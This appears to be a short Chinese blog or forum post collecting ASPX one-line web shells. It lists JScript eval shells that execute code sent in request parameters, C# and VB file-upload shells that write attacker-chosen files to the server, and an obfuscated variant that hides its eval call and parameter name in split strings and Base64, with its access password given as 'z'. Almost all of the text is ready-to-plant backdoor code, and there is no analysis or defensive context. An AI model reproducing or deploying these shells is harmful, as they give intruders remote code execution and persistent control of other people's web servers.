马子
ASPX一句话
1) <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
2) <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句话
3) <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句话
4) <% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
5)变异版
<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).
GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
%>
password:z
评论